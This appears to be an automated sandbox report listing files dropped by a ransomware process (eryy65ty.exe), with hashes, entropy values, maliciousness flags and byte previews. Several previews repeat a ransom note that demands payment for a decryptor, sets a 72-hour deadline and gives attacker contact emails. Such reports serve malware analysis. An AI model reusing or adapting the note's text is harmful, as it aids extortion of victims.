                                                                                                                                            SSDEEP:6:PTbQzoEHHVkrLZsi62LxP2Ih71Y4X0zmXAUfiui8Ys7Mcmn:PAz1I1siN1YaQSAUfitjrn
                                                                                                                                            MD5:FB414E230F985F272942B0B284C5693F
                                                                                                                                            SHA1:416FBD95C5B71632EDD022729C4F7DE9E7FA82E2
                                                                                                                                            SHA-256:5BB5E63BAAC54270079DD1943E5A2296CDEE6BFED0C4689143FB13B2A44220F1
                                                                                                                                            SHA-512:2DE9C1CA385D3B3294C3E9A501D608E22C734F9F4FB8570DF22578F9F851B826EA452DF6ED334A85AD61CA7331B82182E22FBCD0A44D5144E356CB5E69C42B68
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:...j......~..................~h`.yV=..{.5....74Q-.f..*#.".Irf.?.O...C.E..K.?.>...'.....~")....._r.wj...i.6..@f.DH.Y......5..~..bS..?...........^$&/A[#...h.`.........Sa.\...._gB\.1.(.6.....A.....N..e..2{:..S........q.(Py..H.....J..G...,..jrg.2......-H..+..@{..vv=.?Gy:.'.0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):49418
                                                                                                                                            Entropy (8bit):1.1546993464370803
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:0N2ZhY1kseYQWBcIdPbC16QZKvRw6itcbVVkv69bjxa+wn:B3CSePWDZSstk669bjxGn
                                                                                                                                            MD5:A1373F6BAC4B5B410041B9A28DD5179B
                                                                                                                                            SHA1:CACA9671A6D4268E78407514C1ABE63440AB4621
                                                                                                                                            SHA-256:718090CC819BF363C645822A155E5973AD28483437E902752CE85F40A5A18539
                                                                                                                                            SHA-512:4D1AEBA5A092A4307E4613FED345684636369BEE115D8E4328384665EA5966C97E5D7FD51D00C8D315903E79DFEEEA10D831763BEC44600AF4905DF9CD2EF77D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:h..c[.J...2pEYI.....{F..z.....Se..].GT..Ppc.@.H....w4s.H.?(X)+.......S.).>....u...j.I{z..N.Ld%.i..}..o@.......c.P...:...T.sln.];.(y.*.o.....'....*(.... ..S.2n...?l..#..@V........s.&r...y....+.M.`]...2.G........F..8.)...l...#.v...Nrn.....&.....g.#....0..."..a...R.M...)w.....A...J....+..<..B... .."w....I6.:...BG=.T....w...xW..>.^..............iq.....]....*v.f...@..^.......h....(.v.....HI.......$/...o\.n..c.2h..)..........o3...aB42..v...@.,..q..[.yE.{..I....A.g...5..u.a8....0...m.o,..+...l.-5..t..#'h|...S.9A.......f.......oT*f..P.d...^.....F*H.."/V.....WirH.$...=..).y....h.6...L..%6.B.xC..E..)...;..$7{..M..v..o.q.=.w1TE..R.]..)B...N.......O3..G.B.X..>YC&l..1....N...?N....(....}....BJ).i+..5.kr..6...p`FY%..x....c...A.].t.......?....?|..J....8;..G....~....L.)......._..j.x.....=.R._{>.*......h.O)..........t..*k7.,...(.=.S.iZQ.......F.(.7Dy0..GU].<08.{....mf.O_...yEe.uta..v..~ .n.j.0..j..*NxH.....0........zkO...e..>...U..........Y,
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):590090
                                                                                                                                            Entropy (8bit):4.470739499734605
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:Fck5ocEznClWiXOEwvSA2Ekybq3iXQXaD5oZ/o7gT:Fck+cEJiXOEwvSnebqSuaDGZgC
                                                                                                                                            MD5:3E03AC58396B37FAF772148FD1383C0F
                                                                                                                                            SHA1:71B639A9AD4D1DC024E02E6055D9A2A71B55E8D5
                                                                                                                                            SHA-256:7DEFBFB0FB8F9EAC68B34A95C5B0C8712A7EE0B3FF00572D339855551428CC71
                                                                                                                                            SHA-512:FC89D0CFE6759B7A1B85014BA73ADB45AFDF754DDCB5F40B06734623103BB50C812DF5639B783931563EA5BBA10434553CA643891AC2A7A07A7D610875BEC20C
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:k......"h...@'.#/l@..~}.. ..9V0.-q%..S..cH.Q.Ke.Q.).4p.i.&.$s......q.r..e$.7.........9..-.s..`V4.[......K.l.G..1.8...l....x....Jp.....!.Ws.d.uTk,.p..35.<.FfB.e...~b.{.......b.../Mf+.A.Y...y.fI8W..w.i01.....]E.=k.^....i..#......<.%B..0...41........./..{(..?U.~.otp...|.G.L..f!...."..}A.F.r......L."s.....(._.z......Wy....{...c...9./.O.9.R.0V... >].l..CJ........n.CH...<....I...M.+3..vQ.I|MO+...(.%nD.b*6T.8...0.5....|..=.....VG.I{q..gc...p..b.|.M... .?).m,..w.i.. .....x-.-Y......A.b...<.1.......Q.,..0.-m..E...0.L...{06:{.,.*l..Gn9X1.Yi4I.7;kC....|....G.K7..Mb..4`L7..L.e.{.....w..(.?.?Pec..&........Fc.s....Xjf[%{.Y~$).y[.o.>j..>.}}q.....0.l..1v&u...h..._.+....:b1.L..H.>......o._.e......B..k.#r.&i.@cE......o5St..QH..V..c..B.X.<....[.sx......Q{s..t.E..91%cm.......~.>..V.Y.G..S..-+.4.Tb:..=s..L.........5..v.5..3t...g~.b......E.+:.<.b.0. l.....:..V.K.#..g..6....T...8..I-..}\.A.;$.q...z.f........"@......#..C]..(Q.._.Yt...7..R@.`^!.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):33034
                                                                                                                                            Entropy (8bit):1.6079505663933944
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:8cXCsU+m7ygVKM7tDpeJTqAzxYFp9t9G3Y1TAnoK5wgT42vmtBJE:DhUt3VKM7tYJPzxYXf9G4IzwgTQE
                                                                                                                                            MD5:821737F825D771E909B0BFC503E67C53
                                                                                                                                            SHA1:34FCFAD8AA7C5ADAC6E50329D4F9EB830719034C
                                                                                                                                            SHA-256:8B2DE3A6A838AD0891A855435617A8AC1AF9377298DB5237AB85F382FFD1428C
                                                                                                                                            SHA-512:E0F0F88D8F310BE8B2CA5606DE4A9E92DE1F6108438673ABB368B5FBC3D6166501A77EE2150E97FB973376534D4E79F25E3AFB3B3761D200A1307AAC9F6F41C9
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:.%...tD...3.. "z.-..lE..BO...'L.#.LD.H..S...r$NW..(....U...Zz..}sV..G.2...Y...-(.9...V,.+..*kF..D..~.F.IK.3.soO.S...[....L..3.x.....K..{u....N+...R.\.........;.6.....iE.p...O.....V|...P=`...>. S.f.T.......f..J.r.I.....E....<.M..#g...."..y.n..1.3.....P.c.A2.p.....1..t>u.`.9&...KE.]v.7....$.....PB....q. Lo.... ...!..q.=...."..........7..{........j35..j...........]...a...H....z....z~k|}s.."...Y....Vn..d.e.D...F..q..(L...V<.Z...p..O.....Z.Vf5..........N.w..|Z.. .|..IT.\..Y....&z_.h.L..c..P.....]w..T.....z...x...`E..qr.T....?....YVL..0....}..@Q_..>..........qfRE......_........0.SJ.N.e..>hV#..g.jE.i.....@6|..2..D..BP......y.....>[".w...&..@e..Da.....&v.t..).><.n...{K......L.t..4.3..qY.d...|.x9+.~. ..S$.'.j.3.......c........3:&IW.'~O.;..vH...n.....#..9i.v.....i..*.8....]..H.$?]i.J....._..V.Q.R..k.....\...V.h....k.......F...b.......>#..s........EM.......'.B.V......?Y]2w%......x]c...u.n.XT..f._....2.OIv.j+.QP...................6.jL....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):33034
                                                                                                                                            Entropy (8bit):1.6079505663933944
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:8cXCsU+m7ygVKM7tDpeJTqAzxYFp9t9G3Y1TAnoK5wgT42vmtBJE:DhUt3VKM7tYJPzxYXf9G4IzwgTQE
                                                                                                                                            MD5:821737F825D771E909B0BFC503E67C53
                                                                                                                                            SHA1:34FCFAD8AA7C5ADAC6E50329D4F9EB830719034C
                                                                                                                                            SHA-256:8B2DE3A6A838AD0891A855435617A8AC1AF9377298DB5237AB85F382FFD1428C
                                                                                                                                            SHA-512:E0F0F88D8F310BE8B2CA5606DE4A9E92DE1F6108438673ABB368B5FBC3D6166501A77EE2150E97FB973376534D4E79F25E3AFB3B3761D200A1307AAC9F6F41C9
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.%...tD...3.. "z.-..lE..BO...'L.#.LD.H..S...r$NW..(....U...Zz..}sV..G.2...Y...-(.9...V,.+..*kF..D..~.F.IK.3.soO.S...[....L..3.x.....K..{u....N+...R.\.........;.6.....iE.p...O.....V|...P=`...>. S.f.T.......f..J.r.I.....E....<.M..#g...."..y.n..1.3.....P.c.A2.p.....1..t>u.`.9&...KE.]v.7....$.....PB....q. Lo.... ...!..q.=...."..........7..{........j35..j...........]...a...H....z....z~k|}s.."...Y....Vn..d.e.D...F..q..(L...V<.Z...p..O.....Z.Vf5..........N.w..|Z.. .|..IT.\..Y....&z_.h.L..c..P.....]w..T.....z...x...`E..qr.T....?....YVL..0....}..@Q_..>..........qfRE......_........0.SJ.N.e..>hV#..g.jE.i.....@6|..2..D..BP......y.....>[".w...&..@e..Da.....&v.t..).><.n...{K......L.t..4.3..qY.d...|.x9+.~. ..S$.'.j.3.......c........3:&IW.'~O.;..vH...n.....#..9i.v.....i..*.8....]..H.$?]i.J....._..V.Q.R..k.....\...V.h....k.......F...b.......>#..s........EM.......'.B.V......?Y]2w%......x]c...u.n.XT..f._....2.OIv.j+.QP...................6.jL....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):292
                                                                                                                                            Entropy (8bit):7.112356087935026
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:anak5BERi+ThK2A/ayWRWmY0oIck70glQULKSo9A7b5H0+Hn:TrzI24WRWOckNlQUL5ouX3n
                                                                                                                                            MD5:E2EE23296AAA1A2B320FAB2E5B109445
                                                                                                                                            SHA1:987ABD10BD7E819D0D4D59023CF61E4A641E0116
                                                                                                                                            SHA-256:39C13270823968293055CD4551683C2C8FDB0B3A14B8061968F8B723E677CF62
                                                                                                                                            SHA-512:F8D86F1BBDBC461F2427E801262C777E4D71C30BF85F4ED0F6C40D3E3361300B0216F31A562EDBA328C0EB4B06DA7BAAF310C8DE00001059254A6966871D1A2E
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:.E#...r.`.!w.............~.c..0...U....X...Qx.u-.Q.XI.".G...x%........:c.D ...P....y.m..m....3J....g..*.......~.v...[.g.1*....k.V.`a..7.Mb..E}...w..1.R[...E+.T.W.....|*dR[p.y.(.......^V=&...-...E..a.....x........./...rS...Pj.>..I.).H..]..p|Y++_.y.G.7......^.XF`~..(..6.P...0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):590090
                                                                                                                                            Entropy (8bit):4.470739499734605
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:Fck5ocEznClWiXOEwvSA2Ekybq3iXQXaD5oZ/o7gT:Fck+cEJiXOEwvSnebqSuaDGZgC
                                                                                                                                            MD5:3E03AC58396B37FAF772148FD1383C0F
                                                                                                                                            SHA1:71B639A9AD4D1DC024E02E6055D9A2A71B55E8D5
                                                                                                                                            SHA-256:7DEFBFB0FB8F9EAC68B34A95C5B0C8712A7EE0B3FF00572D339855551428CC71
                                                                                                                                            SHA-512:FC89D0CFE6759B7A1B85014BA73ADB45AFDF754DDCB5F40B06734623103BB50C812DF5639B783931563EA5BBA10434553CA643891AC2A7A07A7D610875BEC20C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:k......"h...@'.#/l@..~}.. ..9V0.-q%..S..cH.Q.Ke.Q.).4p.i.&.$s......q.r..e$.7.........9..-.s..`V4.[......K.l.G..1.8...l....x....Jp.....!.Ws.d.uTk,.p..35.<.FfB.e...~b.{.......b.../Mf+.A.Y...y.fI8W..w.i01.....]E.=k.^....i..#......<.%B..0...41........./..{(..?U.~.otp...|.G.L..f!...."..}A.F.r......L."s.....(._.z......Wy....{...c...9./.O.9.R.0V... >].l..CJ........n.CH...<....I...M.+3..vQ.I|MO+...(.%nD.b*6T.8...0.5....|..=.....VG.I{q..gc...p..b.|.M... .?).m,..w.i.. .....x-.-Y......A.b...<.1.......Q.,..0.-m..E...0.L...{06:{.,.*l..Gn9X1.Yi4I.7;kC....|....G.K7..Mb..4`L7..L.e.{.....w..(.?.?Pec..&........Fc.s....Xjf[%{.Y~$).y[.o.>j..>.}}q.....0.l..1v&u...h..._.+....:b1.L..H.>......o._.e......B..k.#r.&i.@cE......o5St..QH..V..c..B.X.<....[.sx......Q{s..t.E..91%cm.......~.>..V.Y.G..S..-+.4.Tb:..=s..L.........5..v.5..3t...g~.b......E.+:.<.b.0. l.....:..V.K.#..g..6....T...8..I-..}\.A.;$.q...z.f........"@......#..C]..(Q.._.Yt...7..R@.`^!.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4820
                                                                                                                                            Entropy (8bit):7.891555664662338
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:IJwsIw9477aIXBph7ul2BCtiRxZv3bG1TboiW0dgwRn2Qs:QwFsOFGSrRrkoGdgwRPs
                                                                                                                                            MD5:E015B5D910F6DD198DBCA93D7C444577
                                                                                                                                            SHA1:17E5E14CE6E3DEEA159AB104EA79A57DF32DE4E7
                                                                                                                                            SHA-256:C76B703057FA5B38E71BC73CC6CC43E383861B206697D3104B5802AA5CEC8F88
                                                                                                                                            SHA-512:E8B109B5D28C99E0366CA3A5262F32DCD349DCFB7F4B00D5696DBD8EDEA365A0AA2E70C5BA266B241B46FCF4D03C7F5ABDB8715FF5CE9F8F73FF9AEF755EA846
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:..{.@Q.1.g=..9.n..0....'/..Uf.>N1..@.VJ.[...wg}O..u0.~..H.....pB..f..Yd5{.z.T0....]K.`..<........ M..y...<._.1o...9.t...v.Z.O..\|.(..A.....u.2......3Ju5.DW..TR..+..P.cF.Gq....)..R..<..._A.....]....[.(R[r.....J............46.y.....=....e!.w+.cs..(....;;q)..u....DXn...D.[b......j..s[.B..(.:....O.GA.c....9..&.c..k...c..HE>.:g.x...J.6.....o...Y.....&..e..5..T.O.$...?.@I.........-....2.0...M|..h.....`d.J.{.....1@@.v...R..o3..`..h-O........a?.........&.+g.w|.<5.Y.p*.D...E...VK.l.<l..S.`RW.G&V#.%|U'.n."I.._.~X....7...)........JN..s....^;...p......;..)Eaq....i.p}X.-.(?Y.S..0.u.p..........6c...J{...R..B....-.l.A.Q..].8:&_..F.h.Z...%P.-1.G.K9......"e..M..=U..~.G.Q9..J..~&9......u}uSJ.x..?(.h...Th..r..z..d;.|+.{.....6.e..... .L....(....W.'."WO.3..N"S...h=........A.&..E....S....2_.."\.q_.&.2....|C.........S0}.._..E.|"%....(p..&M..../.....vLE...4..l-..5E..wR#.......s4.._......../....07u....Ol..=.4..i.Z./...W..yZ.....:*.L.<c...-.vF. ........Y!.2{!....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4820
                                                                                                                                            Entropy (8bit):7.891555664662338
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:IJwsIw9477aIXBph7ul2BCtiRxZv3bG1TboiW0dgwRn2Qs:QwFsOFGSrRrkoGdgwRPs
                                                                                                                                            MD5:E015B5D910F6DD198DBCA93D7C444577
                                                                                                                                            SHA1:17E5E14CE6E3DEEA159AB104EA79A57DF32DE4E7
                                                                                                                                            SHA-256:C76B703057FA5B38E71BC73CC6CC43E383861B206697D3104B5802AA5CEC8F88
                                                                                                                                            SHA-512:E8B109B5D28C99E0366CA3A5262F32DCD349DCFB7F4B00D5696DBD8EDEA365A0AA2E70C5BA266B241B46FCF4D03C7F5ABDB8715FF5CE9F8F73FF9AEF755EA846
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..{.@Q.1.g=..9.n..0....'/..Uf.>N1..@.VJ.[...wg}O..u0.~..H.....pB..f..Yd5{.z.T0....]K.`..<........ M..y...<._.1o...9.t...v.Z.O..\|.(..A.....u.2......3Ju5.DW..TR..+..P.cF.Gq....)..R..<..._A.....]....[.(R[r.....J............46.y.....=....e!.w+.cs..(....;;q)..u....DXn...D.[b......j..s[.B..(.:....O.GA.c....9..&.c..k...c..HE>.:g.x...J.6.....o...Y.....&..e..5..T.O.$...?.@I.........-....2.0...M|..h.....`d.J.{.....1@@.v...R..o3..`..h-O........a?.........&.+g.w|.<5.Y.p*.D...E...VK.l.<l..S.`RW.G&V#.%|U'.n."I.._.~X....7...)........JN..s....^;...p......;..)Eaq....i.p}X.-.(?Y.S..0.u.p..........6c...J{...R..B....-.l.A.Q..].8:&_..F.h.Z...%P.-1.G.K9......"e..M..=U..~.G.Q9..J..~&9......u}uSJ.x..?(.h...Th..r..z..d;.|+.{.....6.e..... .L....(....W.'."WO.3..N"S...h=........A.&..E....S....2_.."\.q_.&.2....|C.........S0}.._..E.|"%....(p..&M..../.....vLE...4..l-..5E..wR#.......s4.._......../....07u....Ol..=.4..i.Z./...W..yZ.....:*.L.<c...-.vF. ........Y!.2{!....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):316
                                                                                                                                            Entropy (8bit):7.301897957142379
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:dW0s63Oqme/gJKyC61k7enQMkTp8ziOHmboSWkGwn:C63Ie/oKyC61zQMS+z7LSRn
                                                                                                                                            MD5:5710A838F190603B242094CFAAF82F55
                                                                                                                                            SHA1:E4B7B9761BA52336E41A19DC2D8A082BFECCDD6A
                                                                                                                                            SHA-256:C8C89C243E43895194ABDC017F4294B9FB193F760936021B055D2D23A00B6EA2
                                                                                                                                            SHA-512:6DB40FABB2ED4EC9862320FEF5D57326CE37C8BB7DB4FD8A7F0AB09BA79580B2976D941EF674C286721E3E01136C852E33E10B09169AD410A90986F8E2A22F24
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.lP.a.7.B./.$...5.'.)o...B.&sJ/.. .;u.A..B...8}....&..M.%S......,.q....y\.Y.0.}6S.c7.Y.....|.)i"K.&O}.m........S........b5..D.Erk>7.........@.......C..~%.f.W..S..o:=zR.E...8...3.I...!...]...S.c.h.?...L].............l^3...-/W..V..YR..T.9.....(l.....K..|.W.;K...G.P[..$4HG._RF.a\.P.....\.P(.U90xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):316
                                                                                                                                            Entropy (8bit):7.301897957142379
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:dW0s63Oqme/gJKyC61k7enQMkTp8ziOHmboSWkGwn:C63Ie/oKyC61zQMS+z7LSRn
                                                                                                                                            MD5:5710A838F190603B242094CFAAF82F55
                                                                                                                                            SHA1:E4B7B9761BA52336E41A19DC2D8A082BFECCDD6A
                                                                                                                                            SHA-256:C8C89C243E43895194ABDC017F4294B9FB193F760936021B055D2D23A00B6EA2
                                                                                                                                            SHA-512:6DB40FABB2ED4EC9862320FEF5D57326CE37C8BB7DB4FD8A7F0AB09BA79580B2976D941EF674C286721E3E01136C852E33E10B09169AD410A90986F8E2A22F24
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.lP.a.7.B./.$...5.'.)o...B.&sJ/.. .;u.A..B...8}....&..M.%S......,.q....y\.Y.0.}6S.c7.Y.....|.)i"K.&O}.m........S........b5..D.Erk>7.........@.......C..~%.f.W..S..o:=zR.E...8...3.I...!...]...S.c.h.?...L].............l^3...-/W..V..YR..T.9.....(l.....K..|.W.;K...G.P[..$4HG._RF.a\.P.....\.P(.U90xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):98570
                                                                                                                                            Entropy (8bit):0.6458463883440994
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:xbpUa6MRtRqRjQyCQ/lflu9Q0p393Vp5bi0ww7V8snV1:xFUBMRCR8yCiNix3dbFT
                                                                                                                                            MD5:8D7A536BBF8C418A6DB4A07717787724
                                                                                                                                            SHA1:27C57ED818BB2C53827185E267BC0D21546A0CC6
                                                                                                                                            SHA-256:27A69FA632DF15BEF9F3B5C60B45AF7131D6028082E45BABC75ECA6229AF12C4
                                                                                                                                            SHA-512:BC1B4286FA4E4DB47099836068CCF4A60B3AF38FE5A7381ABF93FD06667CEAB40700C3E593571F706919EA1532FAB24E63EECD27D2A7BAE34A666E34330821BF
                                                                                                                                            Malicious:true
